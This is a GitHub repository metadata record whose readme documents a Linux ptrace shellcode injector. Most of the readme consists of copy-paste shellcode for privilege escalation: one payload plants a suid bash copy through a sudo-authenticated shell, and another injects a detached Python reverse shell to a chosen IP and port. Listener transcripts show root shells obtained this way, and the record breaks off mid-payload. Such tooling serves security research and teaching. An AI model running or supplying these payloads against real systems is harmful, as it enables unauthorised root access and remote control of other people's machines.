{"id":16714108,"url":"https://github.com/therealdreg/drx_ptrace_shellcode_injector","last_synced_at":"2025-09-11T16:06:42.357Z","repository":{"id":56191287,"uuid":"313545967","full_name":"therealdreg/drx_ptrace_shellcode_injector","owner":"therealdreg","description":"drx ptrace shellcode injector","archived":false,"fork":false,"pushed_at":"2023-08-11T06:22:01.000Z","size":68,"stargazers_count":7,"open_issues_count":0,"forks_count":5,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-04-10T06:14:25.839Z","etag":null,"topics":["debugging-tool","linux","ptrace","ptrace-injection","shellcode-injection","x86","x86-64"],"latest_commit_sha":null,"homepage":"https://rootkit.es/","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/therealdreg.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":["therealdreg"],"patreon":"dreg","custom":["https://www.paypal.me/therealdreg","https://www.paypal.me/therealdreg"]}},"created_at":"2020-11-17T07:53:09.000Z","updated_at":"2024-06-27T12:14:35.000Z","dependencies_parsed_at":"2025-02-16T19:43:37.397Z","dependency_job_id":null,"html_url":"https://github.com/therealdreg/drx_ptrace_shellcode_injector","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/therealdreg/drx_ptrace_shellcode_injector","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/therealdreg%2Fdrx_ptrace_shellcode_injector","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/therealdreg%2Fdrx_ptrace_shellcode_injector/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/therealdreg%2Fdrx_ptrace_shellcode_injector/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/therealdreg%2Fdrx_ptrace_shellcode_injector/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/therealdreg","download_url":"https://codeload.github.com/therealdreg/drx_ptrace_shellcode_injector/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/therealdreg%2Fdrx_ptrace_shellcode_injector/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":274665129,"owners_count":25327120,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-11T02:00:13.660Z","response_time":74,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["debugging-tool","linux","ptrace","ptrace-injection","shellcode-injection","x86","x86-64"],"created_at":"2024-10-12T20:49:20.113Z","updated_at":"2025-09-11T16:06:42.272Z","avatar_url":"https://github.com/therealdreg.png","language":"C","readme":"# drx_ptrace_shellcode_injector\ndrx ptrace shellcode injector\n\nPlease, consider make a donation: https://github.com/sponsors/therealdreg\n\n**WARNING: only works for x86_64 systems (x86 will be supported)**\n\nCurrent support:\n* Can inject code from x86_64-drx-compiled to x86_64 process\n* Can inject code from x86_64-drx-compiled to x86 process\n\n## How to compile\n\n```\ngcc -o drx drx.c\n```\n\n## How to use\n\nYou can inject some shellcodes:\n\n### Default builtin hello world shellcode\n\n./drx PID\n\n```\n./drx 4940\n```\n\n### bash suid local privilege escalation via ptrace misconfiguration\n\nBased from: https://github.com/David-Reguera-Garcia-Dreg/ptrace_misconfiguration_local_privilege_escalation\n\nInjects into sudo-authenticated-shell process: **/bin/sh -c \"/bin/echo | /usr/bin/sudo -S cp /bin/bash /tmp \u003e/dev/null 2\u003e\u00261 \u0026\u0026 echo | /usr/bin/sudo -S /usr/bin/chmod +s /tmp/bash \u003e/dev/null 2\u003e\u00261`\"**\n\nFor a 32 bit process:\n```\n./drx PID \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xb8\\x02\\x00\\x00\\x00\\xcd\\x80\\x83\\xf8\\x00\\x74\\x2e\\x6a\\x00\\x6a\\x00\\x6a\\x00\\x6a\\x00\\x6a\\x00\\x6a\\x00\\x89\\xc3\\xb9\\x00\\x00\\x00\\x00\\xba\\x00\\x00\\x00\\x00\\xbe\\x00\\x00\\x00\\x00\\xbf\\x00\\x00\\x00\\x00\\xb8\\x72\\x00\\x00\\x00\\xcd\\x80\\xe9\\xbd\\x00\\x00\\x00\\x6a\\x00\\xe8\\x86\\x00\\x00\\x00\\x2f\\x62\\x69\\x6e\\x2f\\x65\\x63\\x68\\x6f\\x20\\x7c\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x2d\\x53\\x20\\x63\\x70\\x20\\x2f\\x62\\x69\\x6e\\x2f\\x62\\x61\\x73\\x68\\x20\\x2f\\x74\\x6d\\x70\\x20\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x20\\x32\\x3e\\x26\\x31\\x20\\x26\\x26\\x20\\x65\\x63\\x68\\x6f\\x20\\x7c\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x2d\\x53\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x63\\x68\\x6d\\x6f\\x64\\x20\\x2b\\x73\\x20\\x2f\\x74\\x6d\\x70\\x2f\\x62\\x61\\x73\\x68\\x20\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x20\\x32\\x3e\\x26\\x31\\x00\\xe8\\x03\\x00\\x00\\x00\\x2d\\x63\\x00\\xe8\\x08\\x00\\x00\\x00\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x00\\x8d\\x0c\\x24\\x8b\\x1c\\x24\\x31\\xd2\\xb8\\x0b\\x00\\x00\\x00\\xcd\\x80\\xb8\\x01\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x00\\xcd\\x80\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n```\n\nFor a 64 bit process:\n```\n./drx PID \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xb8\\x39\\x00\\x00\\x00\\x0f\\x05\\x48\\x83\\xf8\\x00\\x74\\x25\\x48\\x89\\xc7\\xbe\\x00\\x00\\x00\\x00\\xba\\x00\\x00\\x00\\x00\\x41\\xba\\x00\\x00\\x00\\x00\\x41\\xb8\\x00\\x00\\x00\\x00\\xb8\\x3d\\x00\\x00\\x00\\x0f\\x05\\xe9\\xc5\\x00\\x00\\x00\\x6a\\x00\\xe8\\x86\\x00\\x00\\x00\\x2f\\x62\\x69\\x6e\\x2f\\x65\\x63\\x68\\x6f\\x20\\x7c\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x2d\\x53\\x20\\x63\\x70\\x20\\x2f\\x62\\x69\\x6e\\x2f\\x62\\x61\\x73\\x68\\x20\\x2f\\x74\\x6d\\x70\\x20\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x20\\x32\\x3e\\x26\\x31\\x20\\x26\\x26\\x20\\x65\\x63\\x68\\x6f\\x20\\x7c\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x2d\\x53\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x63\\x68\\x6d\\x6f\\x64\\x20\\x2b\\x73\\x20\\x2f\\x74\\x6d\\x70\\x2f\\x62\\x61\\x73\\x68\\x20\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x20\\x32\\x3e\\x26\\x31\\x00\\xe8\\x03\\x00\\x00\\x00\\x2d\\x63\\x00\\x48\\x8d\\x05\\x21\\x00\\x00\\x00\\x50\\x48\\x31\\xd2\\x48\\x89\\xe6\\x48\\x8d\\x3d\\x13\\x00\\x00\\x00\\xb8\\x3b\\x00\\x00\\x00\\x0f\\x05\\xb8\\x01\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x00\\x0f\\x05\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x00\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n```\n\nNow get root:\n```\ndreg@fr33project:~$ /tmp/bash -p\nbash-5.0# whoami\nroot\nbash-5.0# id\nuid=1003(dreg) gid=1003(dreg) euid=0(root) egid=0(root) groups=0(root),27(sudo),1003(dreg)\nbash-5.0#\n```\n\n### python reverse shell detached background: local privilege escalation via ptrace misconfiguration\n\nInjects a python reverse shell into sudo-authenticated-shell process\n\nBased from: https://github.com/David-Reguera-Garcia-Dreg/python_reverse_shell_detached_background/\n\nSteps for **64 bit process**:\n\n#### Using pyrev64 script way\n\nJust execute **./drx PID $(./pyrev64 IP PORT)**\n\n**WARNING: Only is valid a range port from 1000 to 9999 (no 89, no 10003 ...)**\n\nExample PID 2904, IP 127.0.0.1, PORT 3456\n```\n./drx 2904 $(./pyrev64 127.0.0.1 3456)\n```\n\nNow get root\n```\nroot@fr33project:~# nc -lvp 3456\nlistening on [any] 3456 ...\nconnect to [51.195.45.136] from fr33project.org [51.195.45.136] 40508\n/bin/sh: 0: can't access tty; job control turned off\n# id\nuid=0(root) gid=0(root) groups=0(root)\n# whoami\nroot\n```\n\n#### By hand way\n\nGenerate IP str, for ex 51.195.45.136\n```\nexport IP_ADDR=51.195.45.136\nxxd -p \u003c\u003c\u003c `printf '%02x' ${IP_ADDR//./ }`  | sed 's/.$//' | sed 's/.$//' | sed 's/\\(..\\)/\\\\\\\\x\u0026/g; s/, $//;'\n```\nresult: \n```\n\\\\x33\\\\x33\\\\x63\\\\x33\\\\x32\\\\x64\\\\x38\\\\x38\n```\n\nGenerate PORT str, WARNING! only is valid a range port from 1000 to 9999 (no 89, no 10003), for ex 6868\n```\nxxd -p \u003c\u003c\u003c 6868 | sed 's/.$//' | sed 's/.$//' | sed 's/\\(..\\)/\\\\\\\\x\u0026/g; s/, $//;'\n```\nresult: \n```\n\\\\x36\\\\x38\\\\x36\\\\x38\n```\n\nReplace in this command the **IP_HEX** and **PORT_HEX** with the PORT STR \u0026 IP STR output:\n\n```\necho -n \"\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\xb8\\\\x39\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x05\\\\x48\\\\x83\\\\xf8\\\\x00\\\\x74\\\\x25\\\\x48\\\\x89\\\\xc7\\\\xbe\\\\x00\\\\x00\\\\x00\\\\x00\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x41\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x41\\\\xb8\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb8\\\\x3d\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x05\\\\xe9\\\\x5f\\\\x02\\\\x00\\\\x00\\\\x6a\\\\x00\\\\xe8\\\\x0d\\\\x02\\\\x00\\\\x00\\\\x65\\\\x78\\\\x65\\\\x63\\\\x28\\\\x22\\\\x22\\\\x22\\\\x0a\\\\x69\\\\x6d\\\\x70\\\\x6f\\\\x72\\\\x74\\\\x20\\\\x73\\\\x6f\\\\x63\\\\x6b\\\\x65\\\\x74\\\\x2c\\\\x73\\\\x75\\\\x62\\\\x70\\\\x72\\\\x6f\\\\x63\\\\x65\\\\x73\\\\x73\\\\x2c\\\\x6f\\\\x73\\\\x2c\\\\x73\\\\x79\\\\x73\\\\x0a\\\\x0a\\\\x70\\\\x69\\\\x64\\\\x72\\\\x67\\\\x20\\\\x3d\\\\x20\\\\x6f\\\\x73\\\\x2e\\\\x66\\\\x6f\\\\x72\\\\x6b\\\\x28\\\\x29\\\\x0a\\\\x69\\\\x66\\\\x20\\\\x70\\\\x69\\\\x64\\\\x72\\\\x67\\\\x20\\\\x3e\\\\x20\\\\x30\\\\x3a\\\\x0a\\\\x20\\\\x20\\\\x20\\\\x20\\\\x20\\\\x20\\\\x20\\\\x20\\\\x73\\\\x79\\\\x73\\\\x2e\\\\x65\\\\x78\\\\x69\\\\x74\\\\x28\\\\x30\\\\x29\\\\x0a\\\\x0a\\\\x6f\\\\x73\\\\x2e\\\\x63\\\\x68\\\\x64\\\\x69\\\\x72\\\\x28\\\\x22\\\\x2f\\\\x22\\\\x29\\\\x0a\\\\x0a\\\\x6f\\\\x73\\\\x2e\\\\x73\\\\x65\\\\x74\\\\x73\\\\x69\\\\x64\\\\x28\\\\x29\\\\x0a\\\\x0a\\\\x6f\\\\x73\\\\x2e\\\\x75\\\\x6d\\\\x61\\\\x73\\\\x6b\\\\x28\\\\x30\\\\x29\\\\x0a\\\\x0a\\\\x64\\\\x72\\\\x67\\\\x70\\\\x69\\\\x64\\\\x20\\\\x3d\\\\x20\\\\x6f\\\\x73\\\\x2e\\\\x66\\\\x6f\\\\x72\\\\x6b\\\\x28\\\\x29\\\\x0a\\\\x69\\\\x66\\\\x20\\\\x64\\\\x72\\\\x67\\\\x70\\\\x69\\\\x64\\\\x20\\\\x3e\\\\x20\\\\x30\\\\x3a\\\\x0a\\\\x20\\\\x20\\\\x20\\\\x20\\\\x20\\\\x20\\\\x20\\\\x20\\\\x73\\\\x79\\\\x73\\\\x2e\\\\x65\\\\x78\\\\x69\\\\x74\\\\x28\\\\x30\\\\x29\\\\x0a\\\\x0a\\\\x73\\\\x79\\\\x73\\\\x2e\\\\x73\\\\x74\\\\x64\\\\x6f\\\\x75\\\\x74\\\\x2e\\\\x66\\\\x6c\\\\x75\\\\x73\\\\x68\\\\x28\\\\x29\\\\x0a\\\\x0a\\\\x73\\\\x79\\\\x73\\\\x2e\\\\x73\\\\x74\\\\x64\\\\x65\\\\x72\\\\x72\\\\x2e\\\\x66\\\\x6c\\\\x75\\\\x73\\\\x68\\\\x28\\\\x29\\\\x0a\\\\x0a\\\\x66\\\\x64\\\\x72\\\\x65\\\\x67\\\\x20\\\\x3d\\\\x20\\\\x6f\\\\x70\\\\x65\\\\x6e\\\\x28\\\\x22\\\\x2f\\\\x64\\\\x65\\\\x76\\\\x2f\\\\x6e\\\\x75\\\\x6c\\\\x6c\\\\x22\\\\x2c\\\\x20\\\\x22\\\\x77\\\\x22\\\\x29\\\\x0a\\\\x0a\\\\x73\\\\x79\\\\x73\\\\x2e\\\\x73\\\\x74\\\\x64\\\\x6f\\\\x75\\\\x74\\\\x20\\\\x3d\\\\x20\\\\x66\\\\x64\\\\x72\\\\x65\\\\x67\\\\x0a\\\\x0a\\\\x73\\\\x79\\\\x73\\\\x2e\\\\x73\\\\x74\\\\x64\\\\x65\\\\x72\\\\x72\\\\x20\\\\x3d\\\\x20\\\\x66\\\\x64\\\\x72\\\\x65\\\\x67\\\\x0a\\\\x0a\\\\x73\\\\x64\\\\x72\\\\x65\\\\x67\\\\x73\\\\x3d\\\\x73\\\\x6f\\\\x63\\\\x6b\\\\x65\\\\x74\\\\x2e\\\\x73\\\\x6f\\\\x63\\\\x6b\\\\x65\\\\x74\\\\x28\\\\x73\\\\x6f\\\\x63\\\\x6b\\\\x65\\\\x74\\\\x2e\\\\x41\\\\x46\\\\x5f\\\\x49\\\\x4e\\\\x45\\\\x54\\\\x2c\\\\x73\\\\x6f\\\\x63\\\\x6b\\\\x65\\\\x74\\\\x2e\\\\x53\\\\x4f\\\\x43\\\\x4b\\\\x5f\\\\x53\\\\x54\\\\x52\\\\x45\\\\x41\\\\x4d\\\\x29\\\\x0a\\\\x0a\\\\x73\\\\x64\\\\x72\\\\x65\\\\x67\\\\x73\\\\x2e\\\\x63\\\\x6f\\\\x6e\\\\x6e\\\\x65\\\\x63\\\\x74\\\\x28\\\\x28\\\\x73\\\\x74\\\\x72\\\\x28\\\\x30\\\\x78\\\\x37\\\\x66\\\\x30\\\\x30\\\\x30\\\\x30\\\\x30\\\\x31\\\\x29\\\\x2c\\\\x39\\\\x39\\\\x39\\\\x39\\\\x29\\\\x29\\\\x0a\\\\x0a\\\\x6f\\\\x73\\\\x2e\\\\x64\\\\x75\\\\x70\\\\x32\\\\x28\\\\x73\\\\x64\\\\x72\\\\x65\\\\x67\\\\x73\\\\x2e\\\\x66\\\\x69\\\\x6c\\\\x65\\\\x6e\\\\x6f\\\\x28\\\\x29\\\\x2c\\\\x30\\\\x29\\\\x0a\\\\x0a\\\\x6f\\\\x73\\\\x2e\\\\x64\\\\x75\\\\x70\\\\x32\\\\x28\\\\x73\\\\x64\\\\x72\\\\x65\\\\x67\\\\x73\\\\x2e\\\\x66\\\\x69\\\\x6c\\\\x65\\\\x6e\\\\x6f\\\\x28\\\\x29\\\\x2c\\\\x31\\\\x29\\\\x0a\\\\x0a\\\\x6f\\\\x73\\\\x2e\\\\x64\\\\x75\\\\x70\\\\x32\\\\x28\\\\x73\\\\x64\\\\x72\\\\x65\\\\x67\\\\x73\\\\x2e\\\\x66\\\\x69\\\\x6c\\\\x65\\\\x6e\\\\x6f\\\\x28\\\\x29\\\\x2c\\\\x32\\\\x29\\\\x0a\\\\x0a\\\\x70\\\\x3d\\\\x73\\\\x75\\\\x62\\\\x70\\\\x72\\\\x6f\\\\x63\\\\x65\\\\x73\\\\x73\\\\x2e\\\\x63\\\\x61\\\\x6c\\\\x6c\\\\x28\\\\x5b\\\\x22\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x73\\\\x68\\\\x22\\\\x2c\\\\x22\\\\x2d\\\\x69\\\\x22\\\\x5d\\\\x29\\\\x0a\\\\x22\\\\x22\\\\x22\\\\x29\\\\x00\\\\xe8\\\\x03\\\\x00\\\\x00\\\\x00\\\\x2d\\\\x63\\\\x00\\\\xe8\\\\x0c\\\\x00\\\\x00\\\\x00\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x70\\\\x79\\\\x74\\\\x68\\\\x6f\\\\x6e\\\\x00\\\\x48\\\\x8d\\\\x05\\\\x21\\\\x00\\\\x00\\\\x00\\\\x50\\\\x48\\\\x31\\\\xd2\\\\x48\\\\x89\\\\xe6\\\\x48\\\\x8d\\\\x3d\\\\x13\\\\x00\\\\x00\\\\x00\\\\xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x05\\\\xb8\\\\x3c\\\\x00\\\\x00\\\\x00\\\\xbb\\\\x00\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x05\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x73\\\\x75\\\\x64\\\\x6f\\\\x00\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\" | sed 's/\\\\x39\\\\x39\\\\x39\\\\x39/PORT_HEX/g' | sed 's/\\\\x37\\\\x66\\\\x30\\\\x30\\\\x30\\\\x30\\\\x30\\\\x31/IP_HEX/g'\n```\n\nfor this case the end of last command looks like:\n```\n... | sed 's/\\\\x39\\\\x39\\\\x39\\\\x39/\\\\x36\\\\x38\\\\x36\\\\x38/g' | sed 's/\\\\x37\\\\x66\\\\x30\\\\x30\\\\x30\\\\x30\\\\x30\\\\x31/\\\\x33\\\\x33\\\\x63\\\\x33\\\\x32\\\\x64\\\\x38\\\\x38/g'\n```\n\nThe output is the generated shellcode\n\nNow execute drx with target PID and the shellcode generated, ex with 6978 PID:\n\n```\n./drx 6978 \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xb8\\x39\\x00\\x00\\x00\\x0f\\x05\\x48\\x83\\xf8\\x00\\x74\\x25\\x48\\x89\\xc7\\xbe\\x00\\x00\\x00\\x00\\xba\\x00\\x00\\x00\\x00\\x41\\xba\\x00\\x00\\x00\\x00\\x41\\xb8\\x00\\x00\\x00\\x00\\xb8\\x3d\\x00\\x00\\x00\\x0f\\x05\\xe9\\x5f\\x02\\x00\\x00\\x6a\\x00\\xe8\\x0d\\x02\\x00\\x00\\x65\\x78\\x65\\x63\\x28\\x22\\x22\\x22\\x0a\\x69\\x6d\\x70\\x6f\\x72\\x74\\x20\\x73\\x6f\\x63\\x6b\\x65\\x74\\x2c\\x73\\x75\\x62\\x70\\x72\\x6f\\x63\\x65\\x73\\x73\\x2c\\x6f\\x73\\x2c\\x73\\x79\\x73\\x0a\\x0a\\x70\\x69\\x64\\x72\\x67\\x20\\x3d\\x20\\x6f\\x73\\x2e\\x66\\x6f\\x72\\x6b\\x28\\x29\\x0a\\x69\\x66\\x20\\x70\\x69\\x64\\x72\\x67\\x20\\x3e\\x20\\x30\\x3a\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x73\\x79\\x73\\x2e\\x65\\x78\\x69\\x74\\x28\\x30\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x63\\x68\\x64\\x69\\x72\\x28\\x22\\x2f\\x22\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x73\\x65\\x74\\x73\\x69\\x64\\x28\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x75\\x6d\\x61\\x73\\x6b\\x28\\x30\\x29\\x0a\\x0a\\x64\\x72\\x67\\x70\\x69\\x64\\x20\\x3d\\x20\\x6f\\x73\\x2e\\x66\\x6f\\x72\\x6b\\x28\\x29\\x0a\\x69\\x66\\x20\\x64\\x72\\x67\\x70\\x69\\x64\\x20\\x3e\\x20\\x30\\x3a\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x73\\x79\\x73\\x2e\\x65\\x78\\x69\\x74\\x28\\x30\\x29\\x0a\\x0a\\x73\\x79\\x73\\x2e\\x73\\x74\\x64\\x6f\\x75\\x74\\x2e\\x66\\x6c\\x75\\x73\\x68\\x28\\x29\\x0a\\x0a\\x73\\x79\\x73\\x2e\\x73\\x74\\x64\\x65\\x72\\x72\\x2e\\x66\\x6c\\x75\\x73\\x68\\x28\\x29\\x0a\\x0a\\x66\\x64\\x72\\x65\\x67\\x20\\x3d\\x20\\x6f\\x70\\x65\\x6e\\x28\\x22\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x22\\x2c\\x20\\x22\\x77\\x22\\x29\\x0a\\x0a\\x73\\x79\\x73\\x2e\\x73\\x74\\x64\\x6f\\x75\\x74\\x20\\x3d\\x20\\x66\\x64\\x72\\x65\\x67\\x0a\\x0a\\x73\\x79\\x73\\x2e\\x73\\x74\\x64\\x65\\x72\\x72\\x20\\x3d\\x20\\x66\\x64\\x72\\x65\\x67\\x0a\\x0a\\x73\\x64\\x72\\x65\\x67\\x73\\x3d\\x73\\x6f\\x63\\x6b\\x65\\x74\\x2e\\x73\\x6f\\x63\\x6b\\x65\\x74\\x28\\x73\\x6f\\x63\\x6b\\x65\\x74\\x2e\\x41\\x46\\x5f\\x49\\x4e\\x45\\x54\\x2c\\x73\\x6f\\x63\\x6b\\x65\\x74\\x2e\\x53\\x4f\\x43\\x4b\\x5f\\x53\\x54\\x52\\x45\\x41\\x4d\\x29\\x0a\\x0a\\x73\\x64\\x72\\x65\\x67\\x73\\x2e\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x28\\x28\\x73\\x74\\x72\\x28\\x30\\x78\\x33\\x33\\x63\\x33\\x32\\x64\\x38\\x38\\x29\\x2c\\x36\\x38\\x36\\x38\\x29\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x64\\x75\\x70\\x32\\x28\\x73\\x64\\x72\\x65\\x67\\x73\\x2e\\x66\\x69\\x6c\\x65\\x6e\\x6f\\x28\\x29\\x2c\\x30\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x64\\x75\\x70\\x32\\x28\\x73\\x64\\x72\\x65\\x67\\x73\\x2e\\x66\\x69\\x6c\\x65\\x6e\\x6f\\x28\\x29\\x2c\\x31\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x64\\x75\\x70\\x32\\x28\\x73\\x64\\x72\\x65\\x67\\x73\\x2e\\x66\\x69\\x6c\\x65\\x6e\\x6f\\x28\\x29\\x2c\\x32\\x29\\x0a\\x0a\\x70\\x3d\\x73\\x75\\x62\\x70\\x72\\x6f\\x63\\x65\\x73\\x73\\x2e\\x63\\x61\\x6c\\x6c\\x28\\x5b\\x22\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x22\\x2c\\x22\\x2d\\x69\\x22\\x5d\\x29\\x0a\\x22\\x22\\x22\\x29\\x00\\xe8\\x03\\x00\\x00\\x00\\x2d\\x63\\x00\\xe8\\x0c\\x00\\x00\\x00\\x2f\\x62\\x69\\x6e\\x2f\\x70\\x79\\x74\\x68\\x6f\\x6e\\x00\\x48\\x8d\\x05\\x21\\x00\\x00\\x00\\x50\\x48\\x31\\xd2\\x48\\x89\\xe6\\x48\\x8d\\x3d\\x13\\x00\\x00\\x00\\xb8\\x3b\\x00\\x00\\x00\\x0f\\x05\\xb8\\x3c\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x00\\x0f\\x05\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x00\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n```\n\nAnd done, you get a root shell from a sudo shell user\n\n```\ndreg@51.195.45.136:~# nc -lvp 6868\nlistening on [any] 6868 ...\nconnect to [51.195.45.136] from fr33project.org [51.195.45.136] 38672\n/bin/sh: 0: can't access tty; job control turned off\n# whoami\nroot\n# id\nuid=0(root) gid=0(root) groups=0(root)\n```\n---\n\nAnother example for an easy copy-paste: reverse shell to 127.0.0.1:9999, target pid 1081\n\n```\n./drx PID \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xb8\\x39\\x00\\x00\\x00\\x0f\\x05\\x48\\x83\\xf8\\x00\\x74\\x25\\x48\\x89\\xc7\\xbe\\x00\\x00\\x00\\x00\\xba\\x00\\x00\\x00\\x00\\x41\\xba\\x00\\x00\\x00\\x00\\x41\\xb8\\x00\\x00\\x00\\x00\\xb8\\x3d\\x00\\x00\\x00\\x0f\\x05\\xe9\\x5f\\x02\\x00\\x00\\x6a\\x00\\xe8\\x0d\\x02\\x00\\x00\\x65\\x78\\x65\\x63\\x28\\x22\\x22\\x22\\x0a\\x69\\x6d\\x70\\x6f\\x72\\x74\\x20\\x73\\x6f\\x63\\x6b\\x65\\x74\\x2c\\x73\\x75\\x62\\x70\\x72\\x6f\\x63\\x65\\x73\\x73\\x2c\\x6f\\x73\\x2c\\x73\\x79\\x73\\x0a\\x0a\\x70\\x69\\x64\\x72\\x67\\x20\\x3d\\x20\\x6f\\x73\\x2e\\x66\\x6f\\x72\\x6b\\x28\\x29\\x0a\\x69\\x66\\x20\\x70\\x69\\x64\\x72\\x67\\x20\\x3e\\x20\\x30\\x3a\\x0a\\x20\\x20\\x20\\